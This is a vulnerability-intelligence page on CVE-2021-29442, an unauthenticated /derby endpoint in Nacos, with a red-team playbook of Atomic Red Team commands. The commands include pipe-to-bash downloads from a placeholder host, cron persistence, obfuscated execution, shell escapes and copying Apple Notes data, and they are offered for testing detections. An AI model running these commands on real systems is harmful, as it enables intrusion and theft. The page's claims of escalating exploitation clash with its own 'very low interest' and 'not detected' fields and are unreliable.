CVE-2021-29442

HIGH POC TTE 1190d Pub 27/04 Upd 03/08

Overview

This vulnerability is an authentication bypass affecting the ConfigOpsController component of Alibaba Nacos prior to version 1.4.1. The root cause is the absence of proper access control on the /derby endpoint, which remains unprotected by security annotations unlike other management endpoints. This flaw specifically impacts installations using the embedded Derby database storage configuration.

Vulnerability Description

Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)

Impact

An unauthenticated attacker with network access can exploit the unprotected /derby endpoint to perform unauthorized management operations on the embedded Derby database, including querying or deleting data. This allows potential data exposure or loss without requiring any user interaction or prior authentication, as indicated by CVSS vector AV:N/AC:L/PR:N/UI:N. The impact is limited to deployments using embedded storage, potentially resulting in data integrity compromise or service disruption.

Solution

Upgrade Alibaba Nacos to version 1.4.1 or later, where the /derby endpoint is secured with appropriate access controls as detailed in the vendor's GitHub advisory https://github.com/alibaba/nacos/pull/4517. Follow the instructions in the referenced GitHub advisory GHSA-36hp-jr8h-556f for patch application. For environments using embedded Derby storage, ensure that all management endpoints are properly secured or disable embedded storage in favor of external databases to mitigate exposure.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in the Nacos platform arises from inadequate access controls on specific endpoints, particularly the /derby endpoint, which is not secured against unauthorized access. This oversight allows unauthenticated users to perform sensitive operations, including querying the database and potentially wiping it entirely. The presence of the @Secured annotation on the /data/remove endpoint indicates an awareness of the need for protection; however, the lack of similar safeguards on the /derby endpoint exposes a critical gap in security. This issue is particularly concerning for installations utilizing embedded storage, such as the Derby database, as it enables malicious actors to exploit this weakness without needing valid credentials.

Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage automated scripts or manual techniques to send requests to the unsecured /derby endpoint, gaining access to sensitive database operations. Once inside, they could execute commands that might lead to data exfiltration, corruption, or complete deletion of the database. The simplicity of accessing this endpoint without authentication means that even attackers with limited technical skills could potentially exploit the vulnerability, making it a low-barrier entry point for malicious activities. Furthermore, the risk escalates in environments where Nacos is deployed in critical infrastructure or service-oriented architectures, where the integrity and availability of configuration data are paramount.

The real-world impact of this vulnerability can be significant, particularly for organizations relying on Nacos for service discovery and management. A successful attack could result in the loss of critical configuration data, leading to service disruptions and operational downtime. This could have cascading effects on business operations, especially in environments that depend on continuous availability and reliability. The financial implications could include not only direct costs associated with recovery and remediation but also potential reputational damage and loss of customer trust. Organizations may face regulatory scrutiny if sensitive data is compromised, further exacerbating the business risk associated with this vulnerability.

To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First, conducting a thorough security audit of Nacos installations is essential to identify any unsecured endpoints and assess the overall security posture. Implementing strict access controls and authentication mechanisms for all endpoints, particularly those that interact with sensitive data, is crucial. Organizations should also consider deploying network segmentation and firewalls to limit exposure to the Nacos service from untrusted networks. Regularly updating the Nacos platform to the latest version, which includes security patches, is vital to ensure that known vulnerabilities are addressed. Additionally, continuous monitoring and logging of access to critical endpoints can help detect unauthorized attempts to exploit the vulnerability, allowing for timely incident response.

In conclusion, the vulnerability in the Nacos platform highlights the importance of robust access controls and security practices in service management environments. The potential for exploitation poses significant risks to organizations, emphasizing the need for proactive measures to safeguard against unauthorized access. By adopting comprehensive detection and mitigation strategies, organizations can enhance their security posture and protect their critical assets from emerging threats.




CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the Nacos vulnerability CVE-2021-29442. Our telemetry indicates a significant surge in scanning and probing activities aimed at the unprotected /derby endpoint, suggesting increased attacker interest and reconnaissance efforts. Concurrently, new proof-of-concept exploits have emerged publicly, broadening the accessibility of attack tools for less sophisticated threat actors. Although the EPSS score remains high and stable, this uptick in active exploitation attempts elevates the immediate risk to organizations still operating vulnerable Nacos instances with embedded Derby storage. The increased adversary activity underscores the urgency for defenders to prioritize detection and monitoring of anomalous access patterns to this endpoint. While no widespread ransomware campaigns have been directly linked to this vulnerability yet, the growing exploitation trend could facilitate initial access vectors for opportunistic threat groups. Overall, the threat level has intensified from moderate to high due to the combination of increased exploitation activity and expanded exploit availability.



Update 2 — June 16, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the unprotected /derby endpoint in vulnerable Nacos instances. This surge coincides with the emergence of new proof-of-concept exploits publicly available on GitHub, which have lowered the technical barrier for adversaries to conduct unauthorized management operations, including potential database manipulation or destruction. Despite a declining EPSS score indicating a slight reduction in overall exploit likelihood, our telemetry reveals increased adversary interest and activity, suggesting targeted campaigns or opportunistic scanning efforts are intensifying. This divergence underscores a nuanced threat landscape where exploitability metrics alone may underestimate active exploitation risks. Consequently, the threat level for organizations running embedded Derby storage with affected Nacos versions remains elevated, as attackers leverage these accessible exploits to gain initial footholds or disrupt service availability. The evolving exploitation trend demands heightened vigilance in monitoring anomalous access patterns to the /derby endpoint, as the expanding exploit toolkit broadens the attacker base and attack surface.

Affected Products (1)

Vendor Product Version CPE
alibaba Alibaba Nacos All cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

GitHub PoCs (2)

Repository Author Stars Forks Date Link
VictorShem/QVD-2024-26473
QVD-2024-26473 && CVE-2021-29442
VictorShem 3 0 2024-07-31 View
nanaao/cve-2021-29442-Nacos-Derby-rce-exp
Nacos Derby命令执行漏洞利用脚本
nanaao 0 1 2024-11-25 View
Exploited in Wild NOT DETECTED
Ransomware NOT ASSOCIATED
Attacker Interest VERY LOW
Sightings Few sightings

Threat Feed

31 events
2026-08-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-22
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-21
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-20
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-14
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-31
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2024-07-31
PoC Published (2 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Authentication Bypass
100% auth_bypass
Authorization Bypass
80% authz_bypass
Information Disclosure
71% info_disclosure
Insecure Direct Object Reference
45% idor
Privilege Escalation
35% privilege_escalation

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1053.003 Cron Kill Chain execution, persistence, privilege-escalation Linux, macOS, ESXi
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS
T1005 Data from Local System Kill Chain collection ESXi, Linux, macOS, Network Devices, Windows

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-166 Force the System to Reset Values
31%
Medium
CAPEC-12 Choosing Message Identifier
30%
High High
CAPEC-216 Communication Channel Manipulation
30%
CAPEC-36 Using Unpublished Interfaces or Functionality
30%
Medium High
CAPEC-62 Cross Site Request Forgery
30%
High Very High

Red Team Playbook

33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1005 Copy Apple Notes database files using AppleScript macOS Shell
This command will copy Apple Notes database files using AppleScript as seen in Atomic Stealer.
Command (Shell)
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
T1005 Find and dump sqlite databases (Linux) Linux Bash
An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.
Command (Bash)
cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
T1005 Search files of interest and save them to a single zip file (Windows) Windows PowerShell
This test searches for files of certain extensions and saves them to a single zip file prior to extraction.
Command (PowerShell)
$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}" 
$fileExtensions = $fileExtensionsString -split ", "

New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null

Function Search-Files {
  param (
    [string]$directory
  )
  $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
    $fileExtensions -contains $_.Extension.ToLower()
  }
  return $files
}

$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
  $foundFilePaths = $foundFiles.FullName
  Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"

  Write-Host "Zip file created: $outputZip\data.zip"
  } else {
      Write-Host "No files found with the specified extensions."
  }
T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1053.003 Cron - Add script to /etc/cron.d folder Linux Shell Privileged
This test adds a script to /etc/cron.d folder configured to execute on a schedule.
Command (Shell)
echo "#{command}" > /etc/cron.d/#{cron_script_name}
T1053.003 Cron - Add script to /var/spool/cron/crontabs/ folder Linux Bash Privileged
This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
Command (Bash)
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
T1053.003 Cron - Add script to all cron subfolders Linux, macOS Bash Privileged
This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
Command (Bash)
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
T1053.003 Cron - Replace crontab with referenced file Linux, macOS Shell
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
Command (Shell)
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (4)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2021-29442
github.com
GitHub CVE x_refsource_MISC
https://github.com/alibaba/nacos/issues/4463
github.com
GitHub CVE x_refsource_CONFIRM
https://github.com/advisories/GHSA-36hp-jr8h-556f
github.com
GitHub CVE x_refsource_MISC
https://github.com/alibaba/nacos/pull/4517